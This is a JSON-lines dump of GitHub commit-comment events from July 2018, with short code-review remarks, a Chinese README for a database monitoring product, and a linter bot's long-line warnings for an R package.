{"id":"7902988302","type":"CommitCommentEvent","actor":{"login":"weineran"},"repo":{"name":"danny1000008/bond"},"payload":{"comment":{"id":29557903,"position":97,"line":189,"path":"bond.py","commit_id":"ca2c1edd018a40c82bc3c62b97f715b2ddec8aa8","created_at":"2018-07-01T12:53:43Z","updated_at":"2018-07-01T12:53:43Z","author_association":"NONE","body":"Is this main method needed? I have a hunch this is dead code..."}},"created_at":"2018-07-01T12:53:43Z"}
{"id":"7902988671","type":"CommitCommentEvent","actor":{"login":"indrekj"},"repo":{"name":"felipeelias/jaeger-client-ruby"},"payload":{"comment":{"id":29557904,"position":5,"line":20,"path":"lib/jaeger/client/collector.rb","commit_id":"e3dd068eccbe2dc1d23a6c73fb4eb67a5de2d3d4","created_at":"2018-07-01T12:54:01Z","updated_at":"2018-07-01T12:54:01Z","author_association":"NONE","body":"cherry-picked to salemove/jaeger-client-ruby https://github.com/salemove/jaeger-client-ruby/commit/1330fdefd4900a20590b06b8978f4cffcc41572d"}},"created_at":"2018-07-01T12:54:01Z"}
{"id":"7902988693","type":"CommitCommentEvent","actor":{"login":"emirhankenter"},"repo":{"name":"emirhankenter/ActorPopularity"},"payload":{"comment":{"id":29557905,"position":null,"line":null,"path":null,"commit_id":"89107f9b8928773f8d669956f7aadfe76cb647c5","created_at":"2018-07-01T12:54:02Z","updated_at":"2018-07-01T12:54:02Z","author_association":"OWNER","body":"Step 1 completed"}},"created_at":"2018-07-01T12:54:02Z"}
{"id":"7902990146","type":"CommitCommentEvent","actor":{"login":"web24365"},"repo":{"name":"web24365/ToSee"},"payload":{"comment":{"id":29557909,"position":null,"line":null,"path":null,"commit_id":"855f26ee0b7cd687bf55f63bf2e06dd909d5aa9a","created_at":"2018-07-01T12:55:05Z","updated_at":"2018-07-01T12:55:05Z","author_association":"OWNER","body":"listview 에서 넘어온 object_list의 첫번째 instance 가져오기:\r\nobject_list.first\r\n첫번째 instance에서 tosee entry 모두 가져오기:\r\nobject_list.first.tosee.toseeentry_set.all"}},"created_at":"2018-07-01T12:55:05Z"}
{"id":"7902990674","type":"CommitCommentEvent","actor":{"login":"sisou"},"repo":{"name":"nimiq/keyguard"},"payload":{"comment":{"id":29557910,"position":18,"line":154,"path":"src/requests/keyguard-api.js","commit_id":"77e6ae9e380671b93b2b48c10b1c8b0aeea58b93","created_at":"2018-07-01T12:55:27Z","updated_at":"2018-07-01T12:55:27Z","author_association":"CONTRIBUTOR","body":"Why does this function have to take and return the guarded action, if it doesn't do anything else with it? Cant it just be a check in the functions below before starting the request? "}},"created_at":"2018-07-01T12:55:27Z"}
{"id":"7902991890","type":"CommitCommentEvent","actor":{"login":"web24365"},"repo":{"name":"web24365/ToSee"},"payload":{"comment":{"id":29557911,"position":null,"line":null,"path":null,"commit_id":"be2df6cd3607924043001132c573df88d58ae5de","created_at":"2018-07-01T12:56:21Z","updated_at":"2018-07-01T12:56:21Z","author_association":"OWNER","body":"check_result view에서 asset의 detail page로 넘겨줄때 PK 값:\r\nobject.asset.pk"}},"created_at":"2018-07-01T12:56:21Z"}
{"id":"7902992793","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29557913,"position":null,"line":null,"path":null,"commit_id":"2b364271ce2f1d5418402da0d8c5bbd213267423","created_at":"2018-07-01T12:57:03Z","updated_at":"2018-07-01T12:57:03Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/6131799/42134583-026abec4-7d3f-11e8-8fda-f760a412027f.png)\r\n"}},"created_at":"2018-07-01T12:57:03Z"}
{"id":"7902994394","type":"CommitCommentEvent","actor":{"login":"issamarmas"},"repo":{"name":"issamarmas/oronge"},"payload":{"comment":{"id":29557917,"position":6,"line":93,"path":"services.html","commit_id":"6ecee4210a03a18e9330096412601270c8dff882","created_at":"2018-07-01T12:58:16Z","updated_at":"2018-07-01T12:58:16Z","author_association":"OWNER","body":"lll\r\n"}},"created_at":"2018-07-01T12:58:16Z"}
{"id":"7902996552","type":"CommitCommentEvent","actor":{"login":"amcgregor"},"repo":{"name":"marrow/WebCore"},"payload":{"comment":{"id":29557920,"position":5,"line":39,"path":"example/controller.py","commit_id":"d5de2ca4085c703fedd376232721e0bd4d8d4074","created_at":"2018-07-01T12:59:55Z","updated_at":"2018-07-01T12:59:55Z","author_association":"MEMBER","body":"Trailing slash was present to reinforce the idea of class-as-folder w/ `__call__` being an `index.html` equivalent."}},"created_at":"2018-07-01T12:59:55Z"}
{"id":"7902996590","type":"CommitCommentEvent","actor":{"login":"issamarmas"},"repo":{"name":"issamarmas/oronge"},"payload":{"comment":{"id":29557921,"position":null,"line":null,"path":null,"commit_id":"f472fbcee6474061a9f21d5386f5821e00dcb157","created_at":"2018-07-01T12:59:57Z","updated_at":"2018-07-01T12:59:57Z","author_association":"OWNER","body":"good "}},"created_at":"2018-07-01T12:59:57Z"}
{"id":"7902998717","type":"CommitCommentEvent","actor":{"login":"51weihoo"},"repo":{"name":"51weihoo/weihoo-DB-Expert"},"payload":{"comment":{"id":29557932,"position":null,"line":null,"path":null,"commit_id":"698705475e50fb535f8b3c71b3e390c3ac5c07f6","created_at":"2018-07-01T13:01:13Z","updated_at":"2018-07-01T13:01:13Z","author_association":"OWNER","body":"[TOC]\r\n#  ***关于Weihoo DB Expert***\r\n\r\n- 高效运维数据库需要什么？\r\n- 一个数据库监控维护平台？\r\n- 一个数据库自动化巡检工具？\r\n- 最好再有一个SQL智能优化软件？\r\n- 你只需要一个数据库管理专家\r\n\r\n![](https://i.loli.net/2018/06/02/5b117c3b7e813.jpg)\r\n![目的图.PNG](https://i.loli.net/2018/06/06/5b17f7ec4f552.png)\r\n\r\n\r\n\r\n\r\n\r\n## 产品概述\r\n\r\n#### 主要功能\r\n                \r\n#### 1. 数据库性能监控\r\n![整体信息.PNG](https://i.loli.net/2018/06/02/5b117f554535e.png)\r\n![性能概况.PNG](https://i.loli.net/2018/06/02/5b117f7a22f80.png)\r\n   weihooDB Expert可通过集中式的管理方式，无需安装代理，便能够实现数据库软件的整体评估，可快速实现数据库性能评估分析、隐患问题发现及诊断、数据库参数标准化配置、数据库容量趋势分析及数据库事件告警等数据库日常维护管理。实现从数据库事件、性能及隐患发现、参数统一管理、快速定位问题根源等应急事件管理，到问题处理建议及性能优化建议等全程数据库智能分析及全生命周期性能故障管理需求。并可自主设置时间段，生成数据库性能管理报表，便于查看及审计。\r\n   \r\n#### 2. 数据库隐患巡检\r\n  ![数据库扫描仪.PNG](https://i.loli.net/2018/06/02/5b1180a78f9e5.png)\r\n  数据库扫描仪采用代理是数据获取方式，旨在通过扫描报告，直观比对性能变化。可支持对不同操作系统（Linux、AIX、Windows）下的数据库进行扫描。\r\n  \r\n#### 3. SQL风险评估\r\n![SQL智能优化.PNG](https://i.loli.net/2018/06/02/5b1181e1c49fd.png)\r\nWeihoo DB Expert可通过数据库中缓冲池、磁盘、排序等各个模块中所消耗的时间分布、发现存在性能问题的SQL语句，对调用SQL的应用程序指标检测及执行计划分析等多种方法逐层追溯导致性能问题的根源，并给出相应优化建议。还定期对数据库中的相关统计信息，数据库表中的行溢出、页重组、索引分裂等信息快速检索，直接定位引起性能问题的相关对象，便于对问题隐患进行根治并进行相应的运维策略设计。\r\n\r\n\r\n\r\n\r\n## 产品部署\r\n#### 1.部署手册\r\n[点击查看部署手册](http://localhost/ \"位置待补充\")\r\n#### 2.体系结构介绍\r\n![体系结构.PNG](https://i.loli.net/2018/06/06/5b17904d3f953.png)\r\n在部署完成后，即可使用Weihoo DB Expert的数据库监控、巡检及SQL审核功能了。添加受控端的资源后（信息包括IP、登陆方式、数据库实例名称、端口、用户名、密码等），进入各功能模块后，关联已添加资源即可，需保证受控端主机与server端网络互通。\r\n\r\n用户除了可使用Weihoo DB Expert自带的相关阈值及规则设置外，还可根据自身需求，调整监控阈值；设置巡检规则；以及根据不同的数据库类型，设置对应的SQL巡检规则。\r\n\r\n## 产品使用说明\r\n#### 文档链接\r\n[点击查看Weihoo DB Expert使用说明](http://localhost/ \"位置待补充\")\r\n\r\n## 联系方式\r\n邮箱：<weihoo_db_expert@51weihoo.com>\r\n#### 交流QQ群\r\n![WeihooDB Expert 交流群群二维码.png](https://i.loli.net/2018/06/26/5b31ba44d740b.png)\r\n"}},"created_at":"2018-07-01T13:01:13Z"}
{"id":"7902998946","type":"CommitCommentEvent","actor":{"login":"amcgregor"},"repo":{"name":"marrow/WebCore"},"payload":{"comment":{"id":29557933,"position":31,"line":78,"path":"example/controller.py","commit_id":"d5de2ca4085c703fedd376232721e0bd4d8d4074","created_at":"2018-07-01T13:01:21Z","updated_at":"2018-07-01T13:01:21Z","author_association":"MEMBER","body":"This is not actually a docstring; docstrings must be the first statement inside a new scope, visible by calling `help(Another)`.  This bit would certainly be a comment, but not a string literal.  :)"}},"created_at":"2018-07-01T13:01:21Z"}
{"id":"7902999904","type":"CommitCommentEvent","actor":{"login":"TeyimPila"},"repo":{"name":"tb/react-redux-crud"},"payload":{"comment":{"id":29557934,"position":7,"line":20,"path":"src/store/categories/actions.js","commit_id":"a263fa49d49536abbce2d3209560f7d6119efa5c","created_at":"2018-07-01T13:02:02Z","updated_at":"2018-07-01T13:02:02Z","author_association":"NONE","body":"This is Dope!"}},"created_at":"2018-07-01T13:02:02Z"}
{"id":"7903001073","type":"CommitCommentEvent","actor":{"login":"ojaha065"},"repo":{"name":"KickVN/SaliensAuto"},"payload":{"comment":{"id":29557937,"position":null,"line":null,"path":null,"commit_id":"a6676b6a608334af66b291d0ea7e437642b089da","created_at":"2018-07-01T13:02:53Z","updated_at":"2018-07-01T13:02:53Z","author_association":"NONE","body":"Correct me if I'm wrong but don't you get the same XP regardless of the damage you deal? So wouldn't it be best to always just deal 1 damage? That way the boss would stay alive longer and we would get more XP, right?"}},"created_at":"2018-07-01T13:02:53Z"}
{"id":"7903001238","type":"CommitCommentEvent","actor":{"login":"spacekookie"},"repo":{"name":"rust-clique/man"},"payload":{"comment":{"id":29557938,"position":null,"line":null,"path":null,"commit_id":"4cf6ef85d8a5a210eb76f49cb2c8924f2a650381","created_at":"2018-07-01T13:03:00Z","updated_at":"2018-07-01T13:03:00Z","author_association":"MEMBER","body":"Why did you indent the code with 2 spaces instead of the standarf 4 spaces that rustfmt usually uses?"}},"created_at":"2018-07-01T13:03:00Z"}
{"id":"7903003064","type":"CommitCommentEvent","actor":{"login":"si-chen"},"repo":{"name":"si-chen/test"},"payload":{"comment":{"id":29557939,"position":1,"line":1,"path":".gitignore","commit_id":"3d3808265213383ef1d4428e55b165ed888cd91f","created_at":"2018-07-01T13:04:16Z","updated_at":"2018-07-01T13:04:16Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-01T13:04:16Z"}
{"id":"7903004867","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29557941,"position":null,"line":null,"path":null,"commit_id":"a8173547518cbcdc3ab846ad85890e262fe2bc22","created_at":"2018-07-01T13:05:35Z","updated_at":"2018-07-01T13:05:35Z","author_association":"NONE","body":"[R/datadocs.R:147:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/R/datadocs.R#L147) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:65:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-comorbid-maps-icd10.R#L65) *style:* **Lines should not be more than 120 characters.**\n```r\n​    chf = c(\"I099\", \"I110\", \"I130\", \"I132\", \"I255\", \"I420\", \"I425\", \"I426\", \"I427\", \"I428\", \"I429\", \"I43\", \"I50\", \"P290\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:66:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-comorbid-maps-icd10.R#L66) *style:* **Lines should not be more than 120 characters.**\n```r\n​    arrhythmia = c(\"I441\", \"I442\", \"I443\", \"I456\", \"I459\", \"I47\", \"I48\", \"I49\", \"R000\", \"R001\", \"R008\", \"T821\", \"Z450\", \"Z950\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:78:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-comorbid-maps-icd10.R#L78) *style:* **Lines should not be more than 120 characters.**\n```r\n​    dm_s = c(\"E100\", \"E101\", \"E109\", \"E110\", \"E111\", \"E119\", \"E120\", \"E121\", \"E129\", \"E130\", \"E131\", \"E139\", \"E140\", \"E141\", \"E149\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:80:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-comorbid-maps-icd10.R#L80) *style:* **Lines should not be more than 120 characters.**\n```r\n​              \"E118\", \"E122\", \"E123\", \"E124\", \"E125\", \"E126\", \"E127\", \"E128\", \"E132\", \"E133\", \"E134\", \"E135\", \"E136\", \"E137\", \"E138\",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:91:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-comorbid-maps-icd10.R#L91) *style:* **Lines should not be more than 120 characters.**\n```r\n​              \"C15\", \"C16\", \"C17\", \"C18\", \"C19\", \"C20\", \"C21\", \"C22\", \"C23\", \"C24\", \"C25\", \"C26\", \"C30\", \"C31\", \"C32\", \"C33\", \"C34\",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:92:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-comorbid-maps-icd10.R#L92) *style:* **Lines should not be more than 120 characters.**\n```r\n​              \"C37\", \"C38\", \"C39\", \"C40\", \"C41\", \"C43\", \"C45\", \"C46\", \"C47\", \"C48\", \"C49\", \"C50\", \"C51\", \"C52\", \"C53\", \"C54\", \"C55\",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:93:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-comorbid-maps-icd10.R#L93) *style:* **Lines should not be more than 120 characters.**\n```r\n​              \"C56\", \"C57\", \"C58\", \"C60\", \"C61\", \"C62\", \"C63\", \"C64\", \"C65\", \"C66\", \"C67\", \"C68\", \"C69\", \"C70\", \"C71\", \"C72\", \"C73\",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd10.R:116:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-comorbid-maps-icd10.R#L116) *style:* **Lines should not be more than 120 characters.**\n```r\n​                 info = paste(\"checking quan elix canonical in indep_kids: \", i, \" - \", names(quan_elix_independent)[i]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:145:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L145) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                 icd_children.icd9(short_code = TRUE, \"00320\", defined = TRUE), defined = TRUE), \"00320\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:167:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L167) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                 icd_children.icd9(short_code = TRUE, \"E800\", defined = FALSE), defined = FALSE), \"E800\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:170:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L170) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(\"003\", short_code = FALSE, defined = FALSE), defined = FALSE), \"003\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:174:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L174) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(short_code = FALSE, \"410\", defined = FALSE), defined = FALSE), \"410\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:176:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L176) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(\"V12\", short_code = FALSE, defined = FALSE), defined = FALSE), \"V12\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:178:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L178) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(short_code = FALSE, \"E800\", defined = FALSE), defined = FALSE), \"E800\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:181:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L181) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(\"003.2\", short_code = FALSE, defined = FALSE), defined = FALSE),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:187:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L187) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(short_code = FALSE, \"410.0\", defined = FALSE), defined = FALSE), \"410.0\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:189:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L189) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(\"V12\", short_code = FALSE, defined = FALSE), defined = FALSE), \"V12\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:191:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L191) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                        icd_children.icd9(short_code = FALSE, \"E800\", defined = FALSE), defined = FALSE), \"E800\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-condense.R:194:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/tests-deprecated/test-condense.R#L194) *style:* **Lines should not be more than 120 characters.**\n```r\n​                                 icd_children.icd9(short_code = TRUE, \"0031\", defined = FALSE), defined = FALSE), \"0031\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-comorbid-maps-icd10.R:126:1:](https://github.com/jackwasey/icd/blob/a8173547518cbcdc3ab846ad85890e262fe2bc22/tests/testthat/test-comorbid-maps-icd10.R#L126) *style:* **Lines should not be more than 120 characters.**\n```r\n​                 info = paste(\"checking quan elix canonical in indep_kids: \", i, \" - \", names(quan_elix_independent)[i]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-01T13:05:35Z"}
{"id":"7903009513","type":"CommitCommentEvent","actor":{"login":"gepb2603"},"repo":{"name":"gepb2603/datasciencecoursera"},"payload":{"comment":{"id":29557948,"position":null,"line":null,"path":null,"commit_id":"84c1fd7644d5a3e0d02650ec37136ea0668405b1","created_at":"2018-07-01T13:09:00Z","updated_at":"2018-07-01T13:09:00Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-01T13:09:00Z"}
{"id":"7903010748","type":"CommitCommentEvent","actor":{"login":"titoiride"},"repo":{"name":"ALaDyn/ALaDyn"},"payload":{"comment":{"id":29557949,"position":null,"line":null,"path":null,"commit_id":"57f50b92f7c196abddd09896c05874a98fd08e8c","created_at":"2018-07-01T13:09:53Z","updated_at":"2018-07-01T13:09:53Z","author_association":"NONE","body":"Non ho capito cosa intendi. Questo commit è \"provvisorio\", nel senso che mi servivano alcuni output dalla diagnostica ma non avevo la precisione necessaria. In qualunque caso ero tentato di aumentare la precisione di tutti gli output dopo aver verificato che effettivamente il mio problema fosse quello. Tu a che doppia colonna ti riferisci? Che coordinata longitudinale devi ricostruire?"}},"created_at":"2018-07-01T13:09:53Z"}
{"id":"7903013047","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29557953,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-01T13:11:33Z","updated_at":"2018-07-01T13:11:33Z","author_association":"NONE","body":"do you know the path the makefile is looking for to find the avcodec.h, so I can manually copy the file to that location?  This is the very first time I have had any issues compiling, so I am suspect of the makefile change, as the culprit."}},"created_at":"2018-07-01T13:11:33Z"}
{"id":"7903013512","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29557954,"position":null,"line":null,"path":null,"commit_id":"11e40d26931c18145c29681bf8b4471ce0e5c2f6","created_at":"2018-07-01T13:11:54Z","updated_at":"2018-07-01T13:11:54Z","author_association":"COLLABORATOR","body":"Puzzle `322-dbccf9a1` disappeared from [`docker/docker-compose.yml`](https://github.com/fidals/shopelectro/blob/master/docker/docker-compose.yml), that's why I closed #341. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-01T13:11:54Z"}
{"id":"7903015177","type":"CommitCommentEvent","actor":{"login":"07160710"},"repo":{"name":"07160710/blog"},"payload":{"comment":{"id":29557960,"position":6,"line":21,"path":"public/index.php","commit_id":"eb3e453995d294e0955140e99ad7cafb3ee57481","created_at":"2018-07-01T13:13:07Z","updated_at":"2018-07-01T13:13:07Z","author_association":"OWNER","body":"生成完注释掉"}},"created_at":"2018-07-01T13:13:07Z"}
{"id":"7903019154","type":"CommitCommentEvent","actor":{"login":"ThrowObject"},"repo":{"name":"ThrowObject/test"},"payload":{"comment":{"id":29557968,"position":null,"line":null,"path":null,"commit_id":"40f1705ad18b857ff88338fec1c9ef9ec285271a","created_at":"2018-07-01T13:15:44Z","updated_at":"2018-07-01T13:15:44Z","author_association":"OWNER","body":"text"}},"created_at":"2018-07-01T13:15:44Z"}
{"id":"7903019966","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"votaguz/frostwire"},"payload":{"comment":{"id":29557971,"position":77,"line":77,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackersDataLine.java","commit_id":"db4e9536668a083b47a4812ab28d4a3a623c76c8","created_at":"2018-07-01T13:16:20Z","updated_at":"2018-07-01T13:16:20Z","author_association":"COLLABORATOR","body":"i guess you didn't understand me when I told you about the alerts in libtorrent, the info is there:\r\n\r\nhttps://libtorrent.org/manual.html#alerts\r\nSee \"tracker_reply_alert\"\r\n\r\n```\r\nThis alert is only for informational purpose. It is generated when a tracker announce succeeds. It is generated regardless what kind of tracker was used, be it UDP, HTTP or the DHT.\r\n\r\nstruct tracker_reply_alert: tracker_alert\r\n{\r\n        // ...\r\n        int num_peers;\r\n};\r\n\r\nThe num_peers tells how many peers were returned from the tracker. This is not necessarily all new peers, some of them may already be connected.\r\n```"}},"created_at":"2018-07-01T13:16:20Z"}
{"id":"7903025653","type":"CommitCommentEvent","actor":{"login":"spinute"},"repo":{"name":"spinute/ods"},"payload":{"comment":{"id":29557980,"position":null,"line":null,"path":null,"commit_id":"ddf475f6e99fe15d3506e3fc5a69dd4bfec4030c","created_at":"2018-07-01T13:20:43Z","updated_at":"2018-07-01T13:20:43Z","author_association":"OWNER","body":"正しくはO(log(log n))では？"}},"created_at":"2018-07-01T13:20:43Z"}
